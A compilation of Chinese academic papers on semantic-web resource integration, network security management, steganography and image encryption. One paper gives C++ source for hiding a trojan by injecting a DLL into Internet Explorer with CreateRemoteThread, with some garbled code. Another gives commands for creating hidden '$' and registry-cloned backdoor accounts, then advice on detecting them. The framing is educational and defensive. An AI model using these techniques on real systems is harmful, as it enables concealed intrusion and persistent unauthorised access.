語義網的核心是本體。R.Studer給本體的定義是“一個本體是一個概念體系(Conceptualization)的顯式的形式化規范”[3]。一個典型的本體由有限個術語以及它們之間的關系組成。術語(Term)指給定論域中的重要概念(如對象和類)。例如,以論文資源為例,標題、關鍵字、主題、作者等,都是術語。本體中概念之間的關系通常包括類的層次結構。除了子類關系外,本體還可以包括以下信息:屬性、值約束、不相交描述和對象間邏輯關系的規定等。語義網通過網絡本體語言來定義本體,以本體清晰明確地表達各種詞匯集和網絡上的不同數據資源間的語義關系,從而在網絡上實現不同詞匯集和數據資源間的共享以及基于網絡的語義查詢和推理。因此,在Web中,本體提供了對給定領域的一種共識,這種共識對于消除術語差別是必要的。本體尤其可以用于提高網絡搜索的精確度,這是因為搜索引擎可以精確地根據本體中的概念查找相關頁面,而不是收集所有出現某些關鍵詞的頁面,這樣就保證了查詢的結果。另外,可以利用本體在網絡搜索中試探更一般或更特殊的查詢。如果一個查詢失敗了,沒有找到相關文檔,看見過引擎可以向用戶推薦更一般的查詢。甚至可以考慮讓搜索引擎主動執行這樣的查詢。

W3C推薦標準是RDF(Resource Description Framework)[2]。它實際上是一個數據模型(Data-Model)。它由一系列陳述(Statement)即“對象-屬性-值”三元組,由此,RDF的數據模型可以很方便地描述對象以及它們的關系。實際上,RDF只提供二元謂詞(屬性)。由于任何復雜的關系都可以分解為多個二元關系,因此RDF的數據模型可以作為其他任何復雜關系模型的基礎模型。通過RDF,可以將基于關鍵詞的檢索更容易地推進到基于語義的檢索。

語義網的基本技術主要包括表示語言(本體開發)、查詢語言、轉換和推理技術以及相關工具等。其中本體的開發是整個語義網的構建基礎,它包括以下一些階段:確定范圍、考慮復用、列舉術語、定義分類、定義屬性、定義側面、定義實例和檢查異常等。可以充分利用已有的本體或元數據,如都柏林核心元數據(Dublin Core metadata terms)[4]是廣為使用的用于資源描述與發現的標準,在利用RDF描述資源時,可以使用其中的一些概念,都柏林核心元數據中典型的概念包括:Title、Creator、Subject等。

從現有知識源(如文本、詞典、遺留知識庫或本體、數據庫模式等)獲取領域知識、以(半)自動方式構造或改編本體即所謂的本體學習(ontology learning),是開發本體的有效途徑。由河海大學許卓明教授等提出的“從ER模式到OWL DL本體的語義保持的翻譯”較好的實現了這一問題,從而使用戶可以方便地將ER模式翻譯成OWL DL本體[5]。

邏輯推理是語義網的重要內容,根據RDF和RDF Schema建模原語,它所使用的形式語言是謂詞邏輯(predicate logic),這通常被認為是所有(基于符號的)知識表示的基礎。用邏輯描述RDF和RDFS的語義排除了二義性,并且是機器可讀的,同時也為借助邏輯推理機制支持RDF/RDFS的自動推理提供了基礎。但是,對于RDF和RDFS而言,它們可以表示某些本體知識,主要建模原主涉及以及類型層次組織起來的詞匯,包括子類關系和子屬關系、定義域和值域限定以及類實例,然而,還是有很多特性不支持,如屬性的局部轄域、類的不相交性、類的布爾組合、基數約束和屬性的特殊性質等。為此,在OWL中增加了一些原語以提供更強的表達能力,從而確保OWL的一些子語言(如OWL DL)對應于一個已經得到充分研究的描述邏輯系統。

3基于RDF的學術資源整合模型研究

在對論文資源庫進行特點分析后可以發現,論文資源庫屬于知識庫,傳統的論文資源基本上有著良好、統一的格式且有著較好的隱藏數據開發潛力,可以在傳統數據格式的基礎上容易地用XML根據用戶自定義的詞匯表編寫結構化網絡文檔,再利用RDF編寫關于網絡對象(論文資源)的簡單陳述句,利用OWL語言創作論文資源本體,給出相應的查詢和邏輯推理機制,最終將開發出具有新一代網絡特征的論文資源語義網絡,極大地方便了用戶的查詢和組織者的管理。

主要任務包括:

1)本體的產生

語義網上存在著各種本體,包括領域本體和全局本體。為了在進行信息檢索時有一個較為統一的模式,以便進行語義推理和檢索,要求定義全局本體的概念。可以從下幾個方面進行定義。

①領域本體:領域本體又稱為全局總體,它是對領域知識的明確清晰的表達,通常用本體語言來進行表述。在一些特定的實際應用中,領域本體及領域本體的合成是很有必要的。

②子領域本體:假定領域D能被分成n個子領域,那么領域D的領域本體也可以被分割成n個子領域本體。由于語義網上不同的領域本體通常用各種不同的本體語言來表述,在進行語義網信息檢索的時候需要將這些用不同本體語言表述的領域本體轉換成統一的形式。轉換過程中不可避免地會出現一些信息的丟失,因此,在進行轉換的同時,對來自同一個領域的領域本體進行一定的事例,得到新的領域本體。經過轉換后的本體就變成了全局本體,也就是用統一的形式表達的各種領域知識集,它能夠用更為精確和統一的方式來表達世界的知識集。領域本體轉換成全局本體的過程可以通過本體轉換工具半自動化地完成。

2)語義推理

推理是指從RDF文檔的顯式(explicit)知識出發,得到文檔中沒有顯式描述的隱藏(implicit)的知識。在OWL-DL所依賴的描述邏輯中,推理主要分為概念之間的包含推理(subsumption relationship inferences)和實例與類之間的實例推理(instance relationship inferences),可以利用這兩種推理在論文資源文檔中發現傳統搜索搜索不到的隱含信息。在RDFS的推理中,需要在前向鏈、反向鏈以及混合方式之間進行選擇。前向鏈將所有數據都交給推理引擎,產生新數據后加入到數據集中;而反向鏈采用邏輯編程技術,當數據模型接受查詢時,將查詢翻譯成目標,引擎利用反向鏈規則通過匹配三元組進行目標歸結。而混合方式則根據實際情況進行 不同的推理選擇。

3)信息檢索

與傳統的基于SQL的檢索方式不同,用戶提交的檢索形式是語義檢索,它有兩個目的,一是將用戶從具體苛刻的檢索關鍵詞中解放出來,用戶只需要了解一組與領域詞匯相關的本體詞條就可以構建成查詢語句;第二是可以通過推理查詢查詢到更加完備的結果。SPARQL[6]查詢語言是W3C的推薦標準,它以子圖匹配的方式在一組RDF數據集中進行匹配查詢。

系統的框架如圖1所示。在圖1中,用戶向系統提交語義查詢,系統在已有的語義資源庫中進行語義匹配,最終生成查詢結果。仍然可以對查詢結果進行語義相關性排序,限于篇幅,該文不對此進行研究。

學術資源庫主要通過對傳統的資源庫進行語義轉化而得到,這種轉換可以是實例的轉化,也可以是建立在傳統資源庫上的虛擬RDF視圖[7]。

圖1系統結構圖

4總結

該文提出一種基于語義Web相關技術的學術資源整合平臺模型,它以RDF、OWL本體形式組織學術資源,為用戶提供語義查詢的結構,通過OWL-DL的內部推理機制,滿足用戶的推理查詢要求,是對傳統的查詢系統的一種極大的改進。

篇(4)

論文關鍵詞:計算機,網絡安全,安全管理,密鑰安全技術

當今社會.網絡已經成為信息交流便利和開放的代名詞.然而伴隨計算機與通信技術的迅猛發展.網絡攻擊與防御技術也在循環遞升,原本網絡固有的優越性、開放性和互聯性變成了信息安全隱患的便利橋梁.網絡安全已變成越來越棘手的問題在此.筆者僅談一些關于網絡安全及網絡攻擊的相關知識和一些常用的安全防范技術。

1網絡信息安全的內涵

網絡安全從其本質上講就是網絡上的信息安全.指網絡系統硬件、軟件及其系統中數據的安全。網絡信息的傳輸、存儲、處理和使用都要求處于安全狀態可見.網絡安全至少應包括靜態安全和動態安全兩種靜態安全是指信息在沒有傳輸和處理的狀態下信息內容的秘密性、完整性和真實性:動態安全是指信息在傳輸過程中不被篡改、竊取、遺失和破壞。

2網絡信息安全的現狀

中國互聯網絡信息中心(CNNIC)的《第23次中國互聯網絡發展狀況統計報告》。報告顯示,截至2008年底,中國網民數達到2.98億.手機網民數超1億達1.137億。

Research艾瑞市場咨詢根據公安部公共信息網絡安全監察局統計數據顯示.2006年中國(大陸)病毒造成的主要危害情況:“瀏覽器配置被修改”是用戶提及率最高的選項.達20.9%.其次病毒造成的影響還表現為“數據受損或丟失”18%.“系統使用受限”16.1%.“密碼被盜”13.1%.另外“受到病毒非法遠程控制”提及率為6.1%“無影響”的只有4.2%。

3安全防范重在管理

在網絡安全中.無論從采用的管理模型,還是技術控制,最重要的還是貫徹始終的安全管理管理是多方面的.有信息的管理、人員的管理、制度的管理、機構的管理等.它的作用也是最關鍵的.是網絡安全防范中的靈魂。

在機構或部門中.各層次人員的責任感.對信息安全的認識、理解和重視程度,都與網絡安全息息相關所以信息安全管理至少需要組織中的所有雇員的參與.此外還需要供應商、顧客或股東的參與和信息安全的專家建議在信息系統設計階段就將安全要求和控制一體化考慮進去.則成本會更低、效率會更高那么做好網絡信息安全管理.至少應從下面幾個方面人手.再結合本部門的情況制定管理策略和措施:

①樹立正確的安全意識.要求每個員工都要清楚自己的職責分工如設立專職的系統管理員.進行定時強化培訓.對網絡運行情況進行定時檢測等。

2)有了明確的職責分工.還要保障制度的貫徹落實.要加強監督檢查建立嚴格的考核制度和獎懲機制是必要的。

③對網絡的管理要遵循國家的規章制度.維持網絡有條不紊地運行。

④應明確網絡信息的分類.按等級采取不同級別的安全保護。

4網絡信息系統的安全防御

4.1防火墻技術

根據CNCERT/CC調查顯示.在各類網絡安全技術使用中.防火墻的使用率最高達到76.5%。防火墻的使用比例較高主要是因為它價格比較便宜.易安裝.并可在線升級等特點防火墻是設置在被保護網絡和外部網絡之間的一道屏障,以防止發生不可預測的、潛在破壞性的侵入。它通過監測、限制、更改跨越防火墻的數據流,盡可能地對外部屏蔽網絡內部的信息、結構和運行狀況.以此來實現網絡的安全保護。

4.2認證技術

認證是防止主動攻擊的重要技術.它對開放環境中的各種消息系統的安全有重要作用.認證的主要目的有兩個:

①驗證信息的發送者是真正的主人

2)驗證信息的完整性,保證信息在傳送過程中未被竄改、重放或延遲等。

4.3信息加密技術

加密是實現信息存儲和傳輸保密性的一種重要手段信息加密的方法有對稱密鑰加密和非對稱密鑰加密.兩種方法各有所長.可以結合使用.互補長短。

4.4數字水印技術

信息隱藏主要研究如何將某一機密信息秘密隱藏于另一公開的信息中.然后通過公開信息的傳輸來傳遞機密信息對信息隱藏而吉.可能的監測者或非法攔截者則難以從公開信息中判斷機密信息是否存在.難以截獲機密信息.從而能保證機密信息的安全隨著網絡技術和信息技術的廣泛應用.信息隱藏技術的發展有了更加廣闊的應用前景。數字水印是信息隱藏技術的一個重要研究方向.它是通過一定的算法將一些標志性信息直接嵌到多媒體內容中.但不影響原內容的價值和使用.并且不能被人的感覺系統覺察或注意到。

4.5入侵檢測技術的應用

篇(5)

關鍵字進程線程木馬動態鏈接庫

木馬程序(也稱后門程序)是能被控制的運行在遠程主機上的程序,由于木馬程序是運行在遠程主機上,所以進程的隱藏無疑是大家關心的焦點。

本文分析了WindowsNT/2000系統下進程隱藏的基本技術和方法,并著重討論運用線程嫁接技術如何實現WindowsNT/2000系統中進程的隱藏。

1基本原理

在WIN95/98中,只需要將進程注冊為系統服務就能夠從進程查看器中隱形,可是這一切在WindowsNT/2000中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能躲過WindowsNT/2000的任務管理器,WindowsNT/2000的任務管理器均能輕松顯示出木馬進程,難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了?我們知道,在WINDOWS系統下,可執行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進程,尋找特定進程是我們發現木馬的方法之一,隨著入侵檢測軟件的不斷發展,關聯進程和SOCKET已經成為流行的技術,假設一個木馬在運行時被檢測軟件同時查出端口和進程,我們基本上認為這個木馬的隱藏已經完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統管理員來說都是可見的,要想做到木馬的進程隱藏,有兩個辦法,第一是讓系統管理員看不見你的進程;第二是不使用進程。本文以第二種方法為例加以討論,其基本原理是將自已的木馬以線程方式嫁接于遠程進程之中,遠程進程則是合法的用戶程序,這樣用戶管理者看到的只是合法進程,而無法發現木馬線程的存在,從而達到隱藏的目的。

2實現方法

為了弄清實現方法,我們必須首先了解Windows系統的另一種"可執行文件"----DLL,DLL是DynamicLinkLibrary(動態鏈接庫)的縮寫,DLL文件是Windows的基礎,因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯,是由多個功能函數構成,它并不能獨立運行,一般都是由進程加載并調用的。因為DLL文件不能獨立運行,所以在進程列表中并不會出現DLL,假設我們編寫了一個木馬DLL,并且通過別的進程來運行它,那么無論是入侵檢測軟件還是進程列表中,都只會出現那個進程而并不會出現木馬DLL,如果那個進程是可信進程,(例如瀏覽器程序IEXPLORE.EXE,沒人會懷疑它是木馬吧?)那么我們編寫的DLL作為那個進程的一部分,也將成為被信賴的一員,也就達到了隱藏的目的。

運行DLL方法有多種,但其中最隱蔽的方法是采用動態嵌入技術,動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上來說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的,但是實際上,我們仍然可以利用種種方法進入并操作進程的私有內存。動態嵌入技術有多種如:窗口Hook、掛接API、遠程線程等,這里介紹一下遠程線程技術,它只要有基本的進線程和動態鏈接庫的知識就可以很輕松地完成動態嵌入。

遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。

3實施步驟

1)用Process32Next()函數找到宿主進程,獲取宿主進程ID,并用

OpenProcess()函數打開宿主進程。

2)用VirtualAllocEx()函數分配遠程進程地址空間中的

內存。

3)用WriteProcessMemory()函數將待隱藏的DLL的路徑名。

4)拷貝到步驟二已經分配的內存中。

5)用GetProcAddress()函數獲取LoadlibraryA()函數的實地址(在kernel32.dll中)。

6)用CreateRemoteThread()函數在遠程進程中創建一個線程。

7)它調用正確的LoadlibraryA()函數。

8)為它傳遞步驟二中分配的內存地址。

4具體實例

下面是在C++Builder4.0環境下編寫的運用遠程線程技術隱藏木馬的程序代碼:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隱藏的DLL文件名

HANDLEhProcessSnap=NULL;//進程快照句柄

HANDLEhRemoteProcess;//遠程進程句柄

LPVOIDpszLibFileRemote;//遠程進程中分配給文件名的空間

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放遠程線程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打開進程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失敗返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//獲取第一個進程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主進程,以IEXPLORE.EXE為例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程

}

else

{

MessageBox(NULL,"取第一個進程失敗","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打開遠程進程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假設hide.dll是待隱藏的進程

intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申請存放文件名的空間

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名寫入申請的空間

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//獲取動態鏈接庫函數地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//創建遠程線

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//關閉遠程線程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//關閉進程快照

}

該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。

至此,遠程嵌入順利完成,為了試驗我們的hide.dll是不是已經正常地在遠程線程運行,我同樣在C++Builder4.0環境下編寫并編譯了下面的hide.dll作為測試:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//獲取當前進程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

當使用RmtDll.exe程序將這個hide.dll嵌入IEXPLORE.EXE進程后假設PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

這證明hide.dll已經在IEXPLORE.EXE進程內正確地運行了。上面程序的頭文件由編譯器自動生成,未作改動,故略之。

5結束語

進程隱藏技術和方法有很多,而且這一技術發展也相當快,本文僅從一個側面加以討論,希望通過這一探討讓我們對進程隱藏技術有一個更清楚的認識,同時也為我們防范他人利用進程隱藏手段非法入侵提供參考,本文拋磚引玉,不當之處誠懇批評指正。

篇(6)

【 中圖分類號 】 TN915.08 【 文獻標識碼 】 A

【 Abstract 】 This paper presents a kind of information hiding technology, first of all, through using DES encryption algorithm to encrypt files, and then through information hiding, encrypted file hidden in the BMP image, the encryption image is exactly the same with the original image, the protection of the data is implemented very well.

【 Keywords 】 information hiding; des; encryption image

1 引言

信息隱藏是上世紀90年代開始興起的信息安全新技術,并成為信息安全技術研究的熱點。傳統通信領域為了保證傳遞的信息能夠不被竊聽或破壞,常采用密碼來保護信息,即讓竊聽者無法看到或聽懂,但是這種技術的缺點是告訴竊聽者這就是秘密信息,特別是隨著計算機技術的發展,密碼的安全性受到很大挑戰。而新的信息隱藏技術是將需要傳遞的秘密信息,隱藏在一個普通的非秘密消息當中,再進行傳輸,這樣即使竊聽者竊聽了傳輸的信息,也只會將其當成普通的消息,而不會懷疑或者無法得知是否有秘密信息的存在。

BMP是目前最常見的一種圖像格式,采用BMP圖像作為隱藏消息的載體具有許多優點。首先,BMP圖像格式是互聯網上圖像傳輸的事實標準,使用這一圖像格式比起其它格式來更不會引起懷疑。其次,BMP壓縮造成的和秘密消息嵌入帶來的圖像質量退化是肉眼很難分辨的。為了更好地保證信息的安全性,本文把文件密碼加密和信息隱藏這兩種技術結合起來:首先利用DES(Data Encryption Standard)把信息文件進行加密,然后把加密后的文件通過選定的BMP圖像以特定算法進行隱藏。

2 信息隱藏算法

信息隱藏把前面的加密信息隱藏在無關緊要的載體BMP圖片中,第三方并不知道秘密通信這個事實的存在,也就是將秘密信息本身的存在藏起來,即使得到了載密對象,也看不到存在的秘密信息。

隱藏算法通過對BMP圖像中選定的DCT系數進行微小變換,以滿足特定的關系來表示一個比特的信息。在提取隱藏的信息時,根據隱藏的逆過程抽取比特信息。其特點是隱藏的數據量較少,但是其抵抗幾何變換等攻擊的能力較強。

在BMP編碼中,量化過程是多對一的映射,它是有損變換過程,如果在量化前嵌入秘密消息,會丟失一些信息,從而導致解碼時不能正確的獲得秘密信息。因此,BMP圖像的隱寫算法的基本原理必須在量化后進行。由前所述,人眼對亮度信號比對色差信號更敏感,因此本工作將秘密消息與量化后的Y分量的DCT系數的LSB聯系起來,從而達到嵌入和提取秘密信息的目的。

隱藏流程如圖1所示,具體分為三步驟。

(1)對BMP圖像的壓縮數據進行解碼,得到量化后的DCT系數。

(2)按照隱寫算法的嵌入規則對Y分量的DCT系數進行修改,將要隱藏的秘密消息嵌入到其中。

① 首先對載體圖像按照8×8的分塊方式進行分塊。如果載體圖像的行數和列數的像素個數不為8的倍數時,則要進行邊界擴充處理,使得行數和列數的像素個數都是8的倍數。設載體圖像的行數為ImgHeight,列數為ImgWidth,Y在行和列方向上的采樣率分別為SampRate_Y_H和SampRate_Y_V,則整幅圖像被分為MCUNum = ImgWidth * ImgHeight / (64 * SampRate_Y_H * SampRate_Y_V)個小塊。

② 讀入待隱信息文件,把其轉換為二進制的位流。設待隱信息文件的長度為FileLength。為了以后提取待隱信息,需要傳遞文件長度,用2個字節表示,可表示的最大數為65535。這樣總的需要隱藏的信息長度 TotalFileLength = FileLength + 2,單位是字節。

③ 對一個MCU,按照對Y分量的DCT系數最低位進行修改。查找預定義的矩陣MIDBAND,該矩陣由數值0,1組成,對其中數值為1的位置修改對應DCT的頻率系數:如果當前待隱信息的二進制值為0,則把相應位置的頻率系數值的最低為修改為0;如果當前待隱信息的二進制值為1,則把相應位置的頻率系數值的最低為修改為1。

④ 對待隱信息文件的二進制流按照③的隱藏方案進行信息隱藏。如果待隱信息文件長度大于載體圖片的最大隱藏量,則把待隱信息文件按照最大隱藏量進行分段,然后分批按照隱藏流程處理。

(3)對修改后的DCT系數進行編碼,重新生成壓縮數據,即載密BMP圖像。對于上面分批隱藏的,生成系列載密圖像如圖2所示。

秘密消息的提取過程是嵌入過程的逆過程,提取算法要和隱寫算法相對應。

3 結束語

在網絡飛速發展的今天,信息隱藏技術的研究具有現實意義。本文將DES加密技術與信息隱藏技術相融合,將加密后的信息隱藏到最常見的BMP圖片中,使整個信息隱藏過程達到比較高的安全級別。信息隱藏技術在商業中的廣泛應用,是一個跨多領域、多學科(數字信號處理、圖像處理、模式識別、數字通信、多媒體技術、密碼學、語音處理等)的技術體系,由于它與具體的應用密切相關,這也決定了信息隱藏技術研究成果的多樣性以及信息隱藏技術研究的不完善性,仍有許多技術問題需要解決。但可以相信,隨著科學技術越來越發達,信息隱藏將有更加廣闊的發展空間。

參考文獻

[1] 夏煜,郎榮玲,曹衛兵等.基于圖像的信息隱藏檢測算法和實現技術研究綜述[J].計算機研究與發展,2004, 41(4):728-736.

[2] 陳波,譚運猛,吳世忠.信息隱藏技術綜述[J].計算機與數字工程, 2005, 33(2):21-23.

[3] 陳雅.基于數字圖像的信息隱藏技術綜述[J].福建電腦,2008, (2):6-6.

篇(7)

 

用戶帳戶是指用戶定義到Windows的所有信息組成的記錄。這些記錄包括用戶名和用戶登錄所需的密碼、用戶帳戶所屬組,以及用戶使用計算機和網絡并訪問資源的權利和權限。通常管理用戶的方式是使用Windows自帶的帳戶管理工具,例如netuser命令、計算機管理中的本地用戶和組等,但是由于這些工具自身存在的缺陷,在使用這些工具的過程中,部分用戶賬號并沒有顯示出來,這些帳戶也就是通常所說的“隱藏賬戶”,有時也叫“影子帳戶”。

一、隱藏賬戶的種類。

在windows中的隱藏帳戶分為以下幾種,下面就來看看這些帳戶的本來面目。

1、最簡單的隱藏帳戶

最簡單的隱藏帳戶可以在CMD模式下通過命令創建。點擊“開始”→“運行”,輸入“CMD”后回車,進入到CMD模式。下面使用“net user”命令來創建帳戶,命令格式為“net user 帳戶名稱 賬戶密碼 /add”,輸入“net user test$ 123456/add”,回車,成功后會顯示“命令成功完成”。

再使用“net user”命令查看當前系統中的帳戶信息列表,發現并沒有剛才創建的“test$”帳戶。那么剛才創建的賬戶是否真的已經存在了呢?讓我們點擊“開始”→“運行”,輸入“compmgmt.msc”后回車,進入到“計算機管理”,查看其中的“本地用戶和組”,在“用戶”一項中,發現剛才建立的賬戶“test$”是存在的(如下圖)。

這說明剛才創建的“test$”確實是一個在CMD模式中不能用“net user”命令查看的隱藏帳戶。

從上面的過程看,“test$”賬戶之所以被隱藏,是因為它的用戶名有“$”后綴,這是windows自身的一種隱藏機制,而且這種通過特殊后綴名創建的賬戶只能在CMD中相對于使用“netuser”命令查看時進行隱藏,而對于通過“本地用戶和組”查看用戶信息則必然“顯形”。其實,由于創建賬戶時默認為將用戶加入到“users”組,在CMD模式中可以直接通過查看“users”組來讓其“顯形”,即在“命令提示符”后輸入“netlocalgroup users”就會列出剛才創建的“test$”。并且這種隱藏賬戶會在用戶切換或系統重啟時自動“顯形”在windows的登錄界面中。因此這種隱藏賬戶的方法是一種初級的隱藏方法,只對那些粗心的管理員有效,是一種入門級的系統賬戶隱藏技術。

2、注冊表型隱藏帳戶

上面創建的隱藏賬戶很容易“顯形”,下面通過注冊表建立一種在CMD模式和“本地用戶和組”中“隱形”的賬戶。,注冊表。

我們都知道,創建的所有賬戶信息都會記錄在注冊表中。點擊“開始”→“運行”,輸入“regedit”后回車,進入到“注冊表編輯器”,來到注冊表編輯器的“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”處,當前系統中所有存在的賬戶都會在這里顯示,當然包括我們的隱藏賬戶(若發現SAM不能展開,則“HKEY_LOCAL_MACHINESAMSAM”處右擊選擇“權限”,在彈出的“SAM的權限”編輯窗口中選中“administrators”賬戶,在下方的權限設置處勾選“完全控制”,完成后點擊“確定”即可。然后我們切換回“注冊表編輯器”,可以發現“HKEY_LOCAL_MACHINESAMSAM”下面的鍵值都可以展開了)。點擊上面創建的隱藏賬戶“test$”,可以看到右邊的窗格中對應的類型顯示為“0x3ec”,在左邊“Names”的上級結點“Users”下可以看到對應的“000003EC”,以上內容可能在實驗中的顯示標識有所不同。

將“test$”的鍵值導出為test$.reg,同時將“000003EC”導出為test$Value.reg。接下來進入CMD模式,在“命令提示符”后輸入“net user test$ /del”將上面建立的隱藏賬戶刪除。最后,將“test$.reg”和“test$Value.reg”導入注冊表,至此,注冊表型隱藏賬戶制作完成。,注冊表。從這種創建賬戶的方式中可以看出,每一個賬戶的關鍵信息保存在注冊表的“Users”的相關結點鍵值中,可以進一步地通過復制“administrator”的鍵值來提升隱藏賬戶的權限。這種創建隱藏用戶的方法也可以使用“HideAdmin”這個軟件非常容易地完成。

二、“狙擊”隱藏賬戶。

如果入侵者在你的系統中創建這樣一些隱藏賬戶,無疑會給你的系統安全帶來極大的危害,下面就采用循序漸進的方式將其“掃地出門”。

1、如果是第一種最簡單的隱藏賬戶,則直接在“在地用戶和組”中將其刪除即可,只是注意在檢查賬戶列表時不能僅僅依靠CMD模式下的“net user”命令。

2、對于注冊表型隱藏賬戶,在系統重啟或進行賬戶的增刪操作后會在“本地用戶和組”中“顯形”出來。那么是不是就可以像第一種一樣直接刪除呢?答案是否定的。,注冊表。直接刪除不能成功執行,那么就只好到注冊表中去刪除相應的結點項了。

3、如果入侵者創建了一個注冊表型隱藏賬戶,并在此基礎上刪除了管理員對注冊表的操作權限。那么管理員是無法通過注冊表刪除隱藏賬戶的,甚至無法知道隱藏賬戶名稱。那我們就只好借助“組策略”的幫助,讓黑客無法通過隱藏賬戶登陸。點擊“開始”→“運行”,輸入“gpedit.msc”運行“組策略”,依次展開至“審核策略”,雙擊右邊的“審核策略更改”,在彈出的設置窗口中勾選“成功”,然后點“確定”。對“審核登陸事件”和“審核過程追蹤”進行相同的設置。這樣我們就可以通過“事件查看器”準確得知隱藏賬戶的名稱和登陸的時間。即使入侵者將所有的登陸日志刪除,系統還會記錄是哪個賬戶刪除了系統日志,這樣入侵者的隱藏賬戶就暴露無疑了。在得知隱藏賬戶的名稱后即使不能刪除這個隱藏賬戶,我們也可以修改其密碼讓其不能登錄,這樣該隱藏賬戶就形同虛設了。,注冊表。

三、防范隱藏賬戶。,注冊表。

與其在隱藏賬戶存在后進行“狙擊”,不如事先采用適當的策略,將隱藏賬戶拒之門外,防患于未然。,注冊表。

1、從管理層次上看,應該做好以下工作:

(1)管理員賬戶在采用強口令的基礎上,除完成必要的管理任務外,不得進行日常操作;

(2)賬戶的增加和刪除應該采用登記機制;

(3)賬戶權限應該采用“最小化”原則,避免越權操作;

(4)管理員應該定期和不定期地對賬戶列表進行檢查,發現非法賬戶應及時進行處理;

(5)建立必要的賬戶恢復和應急策略。

2、從技術層次上看,應該做好以下幾點:

(1)使用“組策略”配置賬戶管理;

(2)關閉遠程注冊表修改服務;

(3)采用多種方式檢查用戶賬戶列表;

(4)充分利用事件查看器中的審核信息進行防范。

從以上的分析可以看出,所謂的隱藏賬戶并不能達到真正的“無形”,只要你理解了windows賬戶的本質,掌握了一定的安全管理技術,具備良好的安全防范意識,隱藏賬戶式的攻擊就會在你的面前知難而退。

參考文獻:

[1]張月紅:《網絡安全與技術》,湖北長江出版社

篇(8)

基本思想是通過混沌系統運算出一個混沌序列,將這個序列按照事先選取的既定的算法或是排列方案進而進一步進行運算以生成新的一個序列。與此同時,為了保證原混沌序列的位置與計算后的新序列之間的變換位置是一一對應的,又進一步利用了混沌系統的遍歷性。實驗表明,這種通過由混沌系統得出的混沌序列的進而對其進一步運算得到的變化關系在應用到圖像置亂后可以實現明顯的圖像置亂效果。同時為了改變加密圖像的統計特性、圖像像素值以及降低圖像像素值間的相關性,也可以通過單個混沌序列或多個復合的混沌序列來實現改變。數字圖像信息隱藏數字圖像信息隱藏技術也可用于保護病人醫學影像的隱私。基本思想是,將需要被加密的醫學圖像的數字信息隱藏在另外一幅無關的圖像中,比如一幅公開圖像。這幅圖像要求具有一定的迷惑性、大眾性,以便迷惑攻擊者,能夠降低轉移其注意力,這樣就降低了圖像被攻擊的幾率;與此同時,通過一定算法改變加密圖像的原有的統計特性。以達到保護被加密影像的目的。應用其中的調配融合算法、“中國拼圖”算法可以使圖像的信息隱藏達到一個高質量的水平。另外,還可以綜合各種不同的算法的特點,將數字隱藏技術擴展到聲音、圖像等不同的信息載體中的信息隱藏需求中去。另外,近年來新興的一種數字作品版權保護技術——數